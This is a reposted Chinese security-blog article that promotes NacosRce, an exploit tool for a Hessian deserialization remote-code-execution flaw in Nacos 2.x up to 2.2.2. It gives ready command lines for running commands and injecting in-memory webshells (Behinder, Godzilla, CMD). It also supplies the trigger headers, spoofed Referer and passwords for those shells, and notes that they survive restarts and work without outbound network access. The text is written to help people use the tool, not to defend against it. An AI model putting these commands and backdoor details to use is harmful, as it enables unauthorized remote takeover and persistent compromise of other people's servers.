Nacos Hessian 反序列化漏洞利用工具

admin 2023年7月5日17:45:48评论94 views字数 1009阅读3分21秒阅读模式

开局先放一张图

Nacos Hessian 反序列化漏洞利用工具

使用方式

自动注入内存马并执行命令:

模板:
java -jar NacosRce.jar Url Jraft端口 "Command"

示例:
java -jar NacosRce.jar http://192.168.90.1:8848/nacos  7848 "whoami"

只注入内存马:

java -jar NacosRce.jar http://192.168.90.1:8848/nacos 7848 memshell

 

冰蝎内存马

1、需要设置请求头x-client-data:rebeyond
2、设置Referer:https://www.google.com/
3、路径随意
4、密码rebeyond

Nacos Hessian 反序列化漏洞利用工具

 

哥斯拉内存马

1、需要设置请求头x-client-data:godzilla
2、设置Referer:https://www.google.com/
3、路径随意
4、密码是pass 和 key

Nacos Hessian 反序列化漏洞利用工具

CMD内存马

1、需要设置请求头x-client-data:cmd
2、设置Referer:https://www.google.com/
3、请求头cmd:要执行的命令

Nacos Hessian 反序列化漏洞利用工具

v0.5 版本实现了:

1、不出网漏洞利用
2、可多次发起漏洞利用
3、同时注入冰蝎/哥斯拉/CMD内存马
4、内存马对nacos多版本进行了兼容

tips:
1、请用jdk1.8
2、适用于 Nacos 2.x <= 2.2.2
3、非集群的也能打哦
4、此内存马重启nacos依然存活

 

关于Windows

如用下面的方式执行,注入内存马时会生成临时文件 C:WindowsTempnacos_data_temp 和 C:WindowsTempnacos_data_temp.class 文件

java -jar NacosRce.jar http://192.168.90.1:8848 7848 "whoami" windows

如果没有在最后加 windows,临时文件会在 /tmp/nacos_data_temp /tmp/nacos_data_temp.class,所以权限足够的话,不指定 windows 也能打成功

windows 没打成功也许是因为没权限操作 C盘 或其他原因

项目地址(欢迎Star,0.5版暂时需要自己编译):

https://github.com/c0olw/NacosRce

Nacos Hessian 反序列化漏洞利用工具

原文始发于微信公众号(刨洞安全团队):Nacos Hessian 反序列化漏洞利用工具

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月5日17:45:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Nacos Hessian 反序列化漏洞利用工具http://cn-sec.com/archives/1855850.html

发表评论

匿名网友 填写信息